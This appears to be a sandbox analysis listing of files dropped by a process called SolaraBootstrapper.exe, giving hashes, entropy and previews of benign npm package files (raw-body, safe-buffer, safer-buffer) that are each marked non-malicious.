                                                  SSDEEP:24:bUMrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bUMaJHlxE35QHOs5exm3ogF5n
                                                  MD5:F22163D3BC6B4BC1BBBDF654FE30AF5B
                                                  SHA1:64F407BB4BE1A9856B71063484B6A31CAC33E16E
                                                  SHA-256:37876D7DE8BDF5E5B9B58A697EBC34044624E493E6F49EFF5C938E5226DCAC6B
                                                  SHA-512:692AE6FCB8B90046374A67948A225C61AF566187BA3604A92406B14D773F6646C77AACC5DF61FD49783F48D72B4ADDD4C0117514D22E1DECED2F26B64B27FE55
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2013-2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2014-2022 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DA
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Java source, ASCII text
                                                  Category:dropped
                                                  Size (bytes):6553
                                                  Entropy (8bit):4.940583595246406
                                                  Encrypted:false
                                                  SSDEEP:96:oXCHQmOz15wheU7IJEE9lQulR1n9AljzaPHoPnCRI2GIESsUiru:oyBh7aZ9lHQjzavmnCu23EGKu
                                                  MD5:48FC13005FB5CF414C22AC67588903FA
                                                  SHA1:360E984030BB1CA698C46AE6B3F1258E63F80766
                                                  SHA-256:2BDF5DC084FEC13FA087101D1C3EFDC22421D19C1551984B49CE6705EB636D57
                                                  SHA-512:667EF9DA41970BC1D0C232526A616AF6825BC22894B74255F8DE0C7C5C9E4D397313F3B2B63C88848FAC73F14E38936BD8F7F1AC675CB542D4886066613A8930
                                                  Malicious:false
                                                  Preview:# raw-body..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build status][github-actions-ci-image]][github-actions-ci-url].[![Test coverage][coveralls-image]][coveralls-url]..Gets the entire buffer of a stream either as a `Buffer` or a string..Validates the stream's length against an expected length and maximum limit..Ideal for parsing request bodies...## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install raw-body.```..### TypeScript..This module includes a [TypeScript](https://www.typescriptlang.org/).declaration file to enable auto complete in compatible editors and type.information for TypeScript projects. This module depends on the Node.js.types, so install `@types/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1188
                                                  Entropy (8bit):4.487034324754042
                                                  Encrypted:false
                                                  SSDEEP:24:1IoSZ8gGzOWSKH+OKWun6xtDF925a/7kJyEyF0eOCYunEfu7WR:1YSCWTAbyia/7xPYun7WR
                                                  MD5:1BB637BF8FF378E713927320C10E746B
                                                  SHA1:92CC51BD40A3D679C86506A29A924F93378CBDB8
                                                  SHA-256:410480C1FCB35DDD5CE7EE8FEA94048E996768BE94DDFD6DC5725AC7AEC089C9
                                                  SHA-512:BB605B19DE97FA36915A3D4087312E45CA7C351889A32410C91D3DCEDFD8D1FE9018751A42FA00D0DCAD7F54A5A5BE47570C8D0F5CD9FBF9F28B7C82F0C7A47D
                                                  Malicious:false
                                                  Preview:# Security Policies and Procedures..## Reporting a Bug..The `raw-body` team and community take all security bugs seriously. Thank you.for improving the security of Express. We appreciate your efforts and.responsible disclosure and will make every effort to acknowledge your.contributions...Report security bugs by emailing the current owners of `raw-body`. This information.can be found in the npm registry using the command `npm owner ls raw-body`..If unsure or unable to get the information from the above, open an issue.in the [project issue tracker](https://github.com/stream-utils/raw-body/issues).asking for the current contact information...To ensure the timely response to your report, please ensure that the entirety.of the report is contained within the email body and not solely behind a web.link or an attachment...At least one owner will acknowledge your email within 48 hours, and will send a.more detailed response within 48 hours indicating the next steps in handling.your report. Aft
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Java source, ASCII text
                                                  Category:dropped
                                                  Size (bytes):2286
                                                  Entropy (8bit):4.716535330616151
                                                  Encrypted:false
                                                  SSDEEP:48:ASmP/xrg//TaGXE+7NI/A0i/Te/0D/o4/4MI/qnDcz/CqEJjMGJeSVNaMJenn5JN:A3Ptg/pJCo0iq2g4qSnDcz5+zJeQNaMy
                                                  MD5:EE9C2C994CBBC6D6E96D6460488AE4F1
                                                  SHA1:33B90142EA3505FA124BCCFEA49BEE515C695DEC
                                                  SHA-256:3D05B353D9341C0DBFF6D21F18490E346C3B661F5FC9D7F36E0E3FE5F940699C
                                                  SHA-512:CCCD8DE526A4A097F7D9320AF2EF7E0772E429805903E319A068CEFE4C3D636A3C35569FD49A5A791EFAC0DBD7A4F34ED8579A87565993AAF6FEED269176BF3D
                                                  Malicious:false
                                                  Preview:import { Readable } from 'stream';..declare namespace getRawBody {. export type Encoding = string | true;.. export interface Options {. /**. * The expected length of the stream.. */. length?: number | string | null;. /**. * The byte limit of the body. This is the number of bytes or any string. * format supported by `bytes`, for example `1000`, `'500kb'` or `'3mb'`.. */. limit?: number | string | null;. /**. * The encoding to use to decode the body into a string. By default, a. * `Buffer` instance will be returned when no encoding is specified. Most. * likely, you want `utf-8`, so setting encoding to `true` will decode as. * `utf-8`. You can use any type of encoding supported by `iconv-lite`.. */. encoding?: Encoding | null;. }.. export interface RawBodyError extends Error {. /**. * The limit in bytes.. */. limit?: number;. /**. * The expected length of the stream.. */. length?: number;. expecte
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):7171
                                                  Entropy (8bit):4.768620091363697
                                                  Encrypted:false
                                                  SSDEEP:192:8ZJAKvoBunmQyMM0y12udG+b4a6tiBtz7XzGIXUXDlp:8ZSKnmDR3dGhE3Y3
                                                  MD5:C7DA7DD272DEB49B1042A6AD81419D5E
                                                  SHA1:8A4CBA78D978452AA8C722F77AB07C0DA12B35E1
                                                  SHA-256:E1C1FF9152EC1F5CF1EF1C2B853D6723E93BA13E4E9F1F15F9C6B2026A39A1CB
                                                  SHA-512:7083169D33557A58E20573AC46DD0DE8E319903BBAFBC3618D7CF19AF88943253A1C34FC232D58B9A0B52221138DCF3BC67B0D412EE98C306D405F23687B607F
                                                  Malicious:false
                                                  Preview:/*!. * raw-body. * Copyright(c) 2013-2014 Jonathan Ong. * Copyright(c) 2014-2022 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var asyncHooks = tryRequireAsyncHooks().var bytes = require('bytes').var createError = require('http-errors').var iconv = require('iconv-lite').var unpipe = require('unpipe')../**. * Module exports.. * @public. */..module.exports = getRawBody../**. * Module variables.. * @private. */..var ICONV_ENCODING_MESSAGE_REGEXP = /^Encoding not recognized: /../**. * Get the decoder for a given encoding.. *. * @param {string} encoding. * @private. */..function getDecoder (encoding) {. if (!encoding) return null.. try {. return iconv.getDecoder(encoding). } catch (e) {. // error getting decoder. if (!ICONV_ENCODING_MESSAGE_REGEXP.test(e.message)) throw e.. // the encoding was not found. throw createError(415, 'specified encoding unsupported', {. encoding: encoding,. type: 'encoding.uns
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1325
                                                  Entropy (8bit):4.850638737778845
                                                  Encrypted:false
                                                  SSDEEP:24:QdHD1KbYxVRh6XeRBBWivIZ2lW08wkeubMGZKLvP:QdZKbGVHueRBBWivIAU37bMGorP
                                                  MD5:58476FBD36D659574FC58355C7349D40
                                                  SHA1:96D635B6625AD7B5727B25ED22D5FB8ECCEC0276
                                                  SHA-256:371D95A705FBDF75BF820E49F7E329A5BA48A7B3A37EB12EFEF3029493318C13
                                                  SHA-512:E3312DC033D6F2B5D5FA32AC2157E6BA8F5E74071EEF79777B835CA508DF7E619BC44F0B67CCB7DC5795115C95E004E346132039D68402802C6D1E567CBB6958
                                                  Malicious:false
                                                  Preview:{. "name": "raw-body",. "description": "Get and validate the raw body of a readable stream.",. "version": "2.5.2",. "author": "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Raynos <raynos2@gmail.com>". ],. "license": "MIT",. "repository": "stream-utils/raw-body",. "dependencies": {. "bytes": "3.1.2",. "http-errors": "2.0.0",. "iconv-lite": "0.4.24",. "unpipe": "1.0.0". },. "devDependencies": {. "bluebird": "3.7.2",. "eslint": "8.34.0",. "eslint-config-standard": "15.0.1",. "eslint-plugin-import": "2.27.5",. "eslint-plugin-markdown": "3.0.0",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "6.1.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "10.2.0",. "nyc": "15.1.0",. "readable-stream": "2.3.7",. "safe-buffer": "5.2.1". },. "engines": {. "node": ">= 0.8". },. "files": [. "HISTORY.md",. "LICENSE",. "REA
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1081
                                                  Entropy (8bit):5.0875408334710945
                                                  Encrypted:false
                                                  SSDEEP:24:b6NermJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:b6IaJHlxE35QHOs5exm3ogF5n
                                                  MD5:BADD5E91C737E7FFDF10B40C1F907761
                                                  SHA1:07D9563F6153658DE124707787FF43F0458AB24A
                                                  SHA-256:C7CC929B57080F4B9D0C6CF57669F0463FC5B39906344DFC8D3BC43426B30EAC
                                                  SHA-512:EF233F8DB609B7025E2E027355EE0B5E7B65B537506412CA1A4D95E74F2BE2FE284C3A3FA36CB9D85DBD1A35FE650FE14DE5B4D93AB071F2024C1FC8CF40730E
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) Feross Aboukhadijeh..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):19555
                                                  Entropy (8bit):5.045310353820335
                                                  Encrypted:false
                                                  SSDEEP:192:3pUPN2yK+iF482S2MMHuYFT6h/to3zpS7zJ4Yku3bnEmkT9OmxrSQcf0ah+TUY6+:ZUlsnqEAuYFmiElkUbEBcQPDb6BPNX2
                                                  MD5:570381FFB15269FA623A0B75E67EB63A
                                                  SHA1:75916065970FAA645BCA603327ECBAEA09AFE12E
                                                  SHA-256:D301A850808775718DDB510D4BF2A922D9B0AFA72894E67137DAA20FBEAFAC05
                                                  SHA-512:4185327934CB42E8495DA451C6FC1A3CB5FD4E3E5C91A46B0C07C0C4A49C03EF8622332E0C441D00DCB5ECDE9D293E76A20BDC6A9FA6AA6E713C6F2AE11A68FD
                                                  Malicious:false
                                                  Preview:# safe-buffer [![travis][travis-image]][travis-url] [![npm][npm-image]][npm-url] [![downloads][downloads-image]][downloads-url] [![javascript style guide][standard-image]][standard-url]..[travis-image]: https://img.shields.io/travis/feross/safe-buffer/master.svg.[travis-url]: https://travis-ci.org/feross/safe-buffer.[npm-image]: https://img.shields.io/npm/v/safe-buffer.svg.[npm-url]: https://npmjs.org/package/safe-buffer.[downloads-image]: https://img.shields.io/npm/dm/safe-buffer.svg.[downloads-url]: https://npmjs.org/package/safe-buffer.[standard-image]: https://img.shields.io/badge/code_style-standard-brightgreen.svg.[standard-url]: https://standardjs.com..#### Safer Node.js Buffer API..**Use the new Node.js Buffer APIs (`Buffer.from`, `Buffer.alloc`,.`Buffer.allocUnsafe`, `Buffer.allocUnsafeSlow`) in all versions of Node.js.**..**Uses the built-in implementation when available.**..## install..```.npm install safe-buffer.```..## usage..The goal of this package is to provide a safe r
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8738
                                                  Entropy (8bit):4.655576194676342
                                                  Encrypted:false
                                                  SSDEEP:192:8pMybxMIm2Y9bhhbTpSKslfUTflkGODllkGxqWJVCPHAl/CkvJcenCC4RbTaoMfE:86slfcl+hlBUglNyG1JK
                                                  MD5:372FA012D04E945AB97C27E000F8DF78
                                                  SHA1:0B5844A33B757B9DB574541363116917FCBC6D90
                                                  SHA-256:5E379DF3D61561C2ED7789B5995B9BA2143BBBA21A905E2381E16EFE7D1FA424
                                                  SHA-512:E420C6F2A15605DE938F77A085453E6C0E84B62AAE7640AA7BF0E576534F6B07FDEFCEEA14CB2773E9A7FB042885B5BD108EF98E90258A37D3E907307C9FC674
                                                  Malicious:false
                                                  Preview:declare module "safe-buffer" {. export class Buffer {. length: number. write(string: string, offset?: number, length?: number, encoding?: string): number;. toString(encoding?: string, start?: number, end?: number): string;. toJSON(): { type: 'Buffer', data: any[] };. equals(otherBuffer: Buffer): boolean;. compare(otherBuffer: Buffer, targetStart?: number, targetEnd?: number, sourceStart?: number, sourceEnd?: number): number;. copy(targetBuffer: Buffer, targetStart?: number, sourceStart?: number, sourceEnd?: number): number;. slice(start?: number, end?: number): Buffer;. writeUIntLE(value: number, offset: number, byteLength: number, noAssert?: boolean): number;. writeUIntBE(value: number, offset: number, byteLength: number, noAssert?: boolean): number;. writeIntLE(value: number, offset: number, byteLength: number, noAssert?: boolean): number;. writeIntBE(value: number, offset: number, byteLength: number, noAssert?: boolean): number;. readUIntLE(of
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1670
                                                  Entropy (8bit):4.817165056217284
                                                  Encrypted:false
                                                  SSDEEP:24:/tNxUVXjkrQZlvNQRyFybMF6BKHpXXGlhxS6T+pT6F+EUQfdFtIA3ylF+MybcF+D:/tEXIrKlvNeOBQkHpXWk3TYVFtI84u
                                                  MD5:35DE14728187B87C9AB687C3BDC37436
                                                  SHA1:94AE42F086B35537CC69D82C0F55C6D59E6B8D98
                                                  SHA-256:184D5C4A83512E3F49D4D5B52F7073F601F933BAD11F1FBB3AD364CA5E6478E1
                                                  SHA-512:B2B3EF941A8D76480F519B68CD05ECF0AACE617A2C414F3E7D375A59718B06F6E7BF88EF384F3E400642431C296BF400F80048E4AD8EFB93860E41D697F337B1
                                                  Malicious:false
                                                  Preview:/*! safe-buffer. MIT License. Feross Aboukhadijeh <https://feross.org/opensource> */./* eslint-disable node/no-deprecated-api */.var buffer = require('buffer').var Buffer = buffer.Buffer..// alternative to using Object.keys for old browsers.function copyProps (src, dst) {. for (var key in src) {. dst[key] = src[key]. }.}.if (Buffer.from && Buffer.alloc && Buffer.allocUnsafe && Buffer.allocUnsafeSlow) {. module.exports = buffer.} else {. // Copy properties from require('buffer'). copyProps(buffer, exports). exports.Buffer = SafeBuffer.}..function SafeBuffer (arg, encodingOrOffset, length) {. return Buffer(arg, encodingOrOffset, length).}..SafeBuffer.prototype = Object.create(Buffer.prototype)..// Copy static methods from Buffer.copyProps(Buffer, SafeBuffer)..SafeBuffer.from = function (arg, encodingOrOffset, length) {. if (typeof arg === 'number') {. throw new TypeError('Argument must not be a number'). }. return Buffer(arg, encodingOrOffset, length).}..SafeBuffer.alloc
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1057
                                                  Entropy (8bit):4.53518551140891
                                                  Encrypted:false
                                                  SSDEEP:24:BVn1zNVNWSylQ3L+mXZc8RdDWwL24RUo+4a+wL:B3fk7Q73XZtdDbPXtW
                                                  MD5:B206856C7EF099626BF28CDC5498787A
                                                  SHA1:6CE1DDDFB8739C577AE2AD84F1ABA01427791F57
                                                  SHA-256:E4018FDBFE625433371F48274FEE26F520BBE865E0D8C85BF3AA07424134B90C
                                                  SHA-512:496945384EEE920998C6C3D7499FCCBC67B34F900DF37082002B108B053283700AEB56F9C6F2D98DA6622EC4CFD75B12714D0934C09B4F47A9E503300B9A477D
                                                  Malicious:false
                                                  Preview:{. "name": "safe-buffer",. "description": "Safer Node.js Buffer API",. "version": "5.2.1",. "author": {. "name": "Feross Aboukhadijeh",. "email": "feross@feross.org",. "url": "https://feross.org". },. "bugs": {. "url": "https://github.com/feross/safe-buffer/issues". },. "devDependencies": {. "standard": "*",. "tape": "^5.0.0". },. "homepage": "https://github.com/feross/safe-buffer",. "keywords": [. "buffer",. "buffer allocate",. "node security",. "safe",. "safe-buffer",. "security",. "uninitialized". ],. "license": "MIT",. "main": "index.js",. "types": "index.d.ts",. "repository": {. "type": "git",. "url": "git://github.com/feross/safe-buffer.git". },. "scripts": {. "test": "standard && tape test/*.js". },. "funding": [. {. "type": "github",. "url": "https://github.com/sponsors/feross". },. {. "type": "patreon",. "url": "https://www.patreon.com/feross". },. {. "type": "consulting
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.139912653301341
                                                  Encrypted:false
                                                  SSDEEP:24:Y1rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:Y1aJHlxE3dQHOs5exm3ogFh
                                                  MD5:3BAEBC2A17B8F5BFF04882CD0DC0F76E
                                                  SHA1:CFCB19AB237382E4CE1253C5F0E28AD153A3C77A
                                                  SHA-256:4BC935E71BE198C67DDF3C2B5FDDB195F6EDC182BFC155A96A6DB61B44B494B9
                                                  SHA-512:9340003E5DBE9766972442DA97F824FC4BECE26C191FCE5310993836717CD9D066EA8008CD685647EF3FC73BFFDCEEB8E554B169C7411ECC336A4F2470F10469
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2018 Nikita Skovoroda <chalkerx@gmail.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (380)
                                                  Category:dropped
                                                  Size (bytes):12794
                                                  Entropy (8bit):4.921514226026537
                                                  Encrypted:false
                                                  SSDEEP:384:4pHfjquxtqWuncJsd79t3sw+bJyY3NpINdCKh:41YWhJs7t3sJt3NqbFh
                                                  MD5:FCAA030E67B1D41E34571B602A343F72
                                                  SHA1:1F23A158DC57C02812BAEF3334EF96BA1C940E5C
                                                  SHA-256:134523D05B39E177135C2A2070A426EB319657DFC77589E38EF7CF13CD50E730
                                                  SHA-512:07519B85D985702822DCD5E0B6A113727BC53F95A33E98B0C5AE6EE140B1D19170B05855BC626AB0E2500C30351E560D404E1529E77568BF80BA59BBD4530C21
                                                  Malicious:false
                                                  Preview:# Porting to the Buffer.from/Buffer.alloc API..<a id="overview"></a>.## Overview..- [Variant 1: Drop support for Node.js . 4.4.x and 5.0.0 . 5.9.x.](#variant-1) (*recommended*).- [Variant 2: Use a polyfill](#variant-2).- [Variant 3: manual detection, with safeguards](#variant-3)..### Finding problematic bits of code using grep..Just run `grep -nrE '[^a-zA-Z](Slow)?Buffer\s*\(' --exclude-dir node_modules`...It will find all the potentially unsafe places in your own code (with some considerably unlikely.exceptions)...### Finding problematic bits of code using Node.js 8..If you.re using Node.js . 8.0.0 (which is recommended), Node.js exposes multiple options that help with finding the relevant pieces of code:..- `--trace-warnings` will make Node.js show a stack trace for this warning and other warnings that are printed by Node.js..- `--trace-deprecation` does the same thing, but only for deprecation warnings..- `--pending-deprecation` will show more types of deprecation warnings.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):8261
                                                  Entropy (8bit):5.094691406772684
                                                  Encrypted:false
                                                  SSDEEP:192:Xp8VQqZ9r3xcEfza35Vr9iuHfxuE3HXVN83jsHF:58VQqZ9r3xxfGDpiuHfxuEXXL83Yl
                                                  MD5:B65F4B9724FF4C546EE7D4820E3C91DC
                                                  SHA1:133890ECC4218D9C67890F0E5884E754E824C859
                                                  SHA-256:D4331B7C5AF9C02161150DAF9451EE6BC7A73ECE3EC0312603FAE09F46A817D8
                                                  SHA-512:606AB220D3E9002AD79374BBEAA1D8822EBCB9DE9A3DD2D31D1B2C181B193CF312D0DBC25D54677FE302900DD1DD4075BB340CA50ED4DD64845FC003A4775A1D
                                                  Malicious:false
                                                  Preview:# safer-buffer [![travis][travis-image]][travis-url] [![npm][npm-image]][npm-url] [![javascript style guide][standard-image]][standard-url] [![Security Responsible Disclosure][secuirty-image]][secuirty-url]..[travis-image]: https://travis-ci.org/ChALkeR/safer-buffer.svg?branch=master.[travis-url]: https://travis-ci.org/ChALkeR/safer-buffer.[npm-image]: https://img.shields.io/npm/v/safer-buffer.svg.[npm-url]: https://npmjs.org/package/safer-buffer.[standard-image]: https://img.shields.io/badge/code_style-standard-brightgreen.svg.[standard-url]: https://standardjs.com.[secuirty-image]: https://img.shields.io/badge/Security-Responsible%20Disclosure-green.svg.[secuirty-url]: https://github.com/nodejs/security-wg/blob/master/processes/responsible_disclosure_template.md..Modern Buffer API polyfill without footguns, working on Node.js from 0.8 to current...## How to use?..First, port all `Buffer()` and `new Buffer()` calls to `Buffer.alloc()` and `Buffer.from()` API...Then, to achieve compati
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1483
                                                  Entropy (8bit):4.858990166784303
                                                  Encrypted:false
                                                  SSDEEP:24:IVXjkg1eN9g4sB4PO90vVOf+bj/IvjYyrwtclF+uTIF79Ru9QSyrbMFMcbUF+uT+:QXIf0B2Oe10jOwS79ROQYCJS79ROQrZ
                                                  MD5:7557E84F2DB56A79916613053F9297D6
                                                  SHA1:F5D11729706B0DE3ED7D6F35060EB73680CCE42F
                                                  SHA-256:1DC2900BCC8FFC375AF0D2FC99A03ECAD2DCBB85D278FBF26982E87707BEA53F
                                                  SHA-512:5758A335E7905960E20F09741078F6584A12D58152C462A17A134BC8A1DCD5DDED3173784B089AD3A5CCC1ACB070D218552A2EE0263FBBDCE8C2CE646327B16C
                                                  Malicious:false
                                                  Preview:/* eslint-disable node/no-deprecated-api */..'use strict'..var buffer = require('buffer').var Buffer = buffer.Buffer.var safer = require('./safer.js').var Safer = safer.Buffer..var dangerous = {}..var key..for (key in safer) {. if (!safer.hasOwnProperty(key)) continue. dangerous[key] = safer[key].}..var Dangereous = dangerous.Buffer = {}..// Copy Safer API.for (key in Safer) {. if (!Safer.hasOwnProperty(key)) continue. Dangereous[key] = Safer[key].}..// Copy those missing unsafe methods, if they are present.for (key in Buffer) {. if (!Buffer.hasOwnProperty(key)) continue. if (Dangereous.hasOwnProperty(key)) continue. Dangereous[key] = Buffer[key].}..if (!Dangereous.allocUnsafe) {. Dangereous.allocUnsafe = function (size) {. if (typeof size !== 'number') {. throw new TypeError('The "size" argument must be of type number. Received type ' + typeof size). }. if (size < 0 || size >= 2 * (1 << 30)) {. throw new RangeError('The value "' + size + '" is invalid for op
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):822
                                                  Entropy (8bit):4.795407598479613
                                                  Encrypted:false
                                                  SSDEEP:12:tF1a3XlpD7NjAicV8QjU4SMKmGPXoBbmWVT6foePVT6j0EzgkdG6VuQv1r:H1KXXxAeYSMK9/njfFCdr
                                                  MD5:274D956F400350C9F6CF96D22CDDA227
                                                  SHA1:5ED0FAB8E5CAC53E4D072ACBD82FCA9BE08F5E67
                                                  SHA-256:4247A3A63C45A6A7CED1557FE4DD9D2A163AF4915D594B95E5867B69A53EDB52
                                                  SHA-512:120CFF7383D78BBF7746F11101E973ED0AF9D0DED6537823F4ACBFA659D29C1BD09D55EC434BDC7661F26CB5278BACC76A55D95248753431F4099F98F9532F94
                                                  Malicious:false
                                                  Preview:{. "name": "safer-buffer",. "version": "2.1.2",. "description": "Modern Buffer API polyfill without footguns",. "main": "safer.js",. "scripts": {. "browserify-test": "browserify --external tape tests.js > browserify-tests.js && tape browserify-tests.js",. "test": "standard && tape tests.js". },. "author": {. "name": "Nikita Skovoroda",. "email": "chalkerx@gmail.com",. "url": "https://github.com/ChALkeR". },. "license": "MIT",. "repository": {. "type": "git",. "url": "git+https://github.com/ChALkeR/safer-buffer.git". },. "bugs": {. "url": "https://github.com/ChALkeR/safer-buffer/issues". },. "devDependencies": {. "standard": "^11.0.1",. "tape": "^4.9.0". },. "files": [. "Porting-Buffer.md",. "Readme.md",. "tests.js",. "dangerous.js",. "safer.js". ].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2110
                                                  Entropy (8bit):4.891651950004989
                                                  Encrypted:false
                                                  SSDEEP:48:QXIdWaJpDrVm0eMBMaU0QNjbTwS79ROMoVFaQwkN+Y0:3dWaJ9r5eIQN976aQjp0
                                                  MD5:B548FA7365E81D472250949A6B4CCC69
                                                  SHA1:AD919CAD501061F663026F382334CC6CE5A8B381
                                                  SHA-256:37F9716144105051AB302F6A0C30A52FF5DE7269B9E1173AC22BE798FC11CCAD
                                                  SHA-512:6B3C16541246DDF1BD12C0CF537FC54DD9ED932C70A834D8DF57D6758BC9532AF554910D4B292F69FA5B3FD0B5F66DCE2451EB3F6CF19BA295D1397BCAD8A574
                                                  Malicious:false
                                                  Preview:/* eslint-disable node/no-deprecated-api */..'use strict'..var buffer = require('buffer').var Buffer = buffer.Buffer..var safer = {}..var key..for (key in buffer) {. if (!buffer.hasOwnProperty(key)) continue. if (key === 'SlowBuffer' || key === 'Buffer') continue. safer[key] = buffer[key].}..var Safer = safer.Buffer = {}.for (key in Buffer) {. if (!Buffer.hasOwnProperty(key)) continue. if (key === 'allocUnsafe' || key === 'allocUnsafeSlow') continue. Safer[key] = Buffer[key].}..safer.Buffer.prototype = Buffer.prototype..if (!Safer.from || Safer.from === Uint8Array.from) {. Safer.from = function (value, encodingOrOffset, length) {. if (typeof value === 'number') {. throw new TypeError('The "value" argument must not be of type number. Received type ' + typeof value). }. if (value && typeof value.length === 'undefined') {. throw new TypeError('The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type ' + typeof
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15735
                                                  Entropy (8bit):4.914204260838717
                                                  Encrypted:false
                                                  SSDEEP:384:ABWvbe5vBmOv+zFPgOXS8d9Qf2loYA6LA9Yc07:AUb+Bt+pPgOmGoj6LA9Yc07
                                                  MD5:373F9327325C35BB109038DC3B8E5A14
                                                  SHA1:DC7FD8AD11F6C0A7DE689697AFC870F58F7A2844
                                                  SHA-256:511906FDF6A233C84A9216065D1701DBFD84F380FBD495AE1CF5A002370B9885
                                                  SHA-512:180379AC8D63F25D27612BF185AAB6736162BC46A219A7F4247C174B525A088ABEA07AF47F46A1A588774B6B975D72F16E48A16E423E93208591DFA394282B2D
                                                  Malicious:false
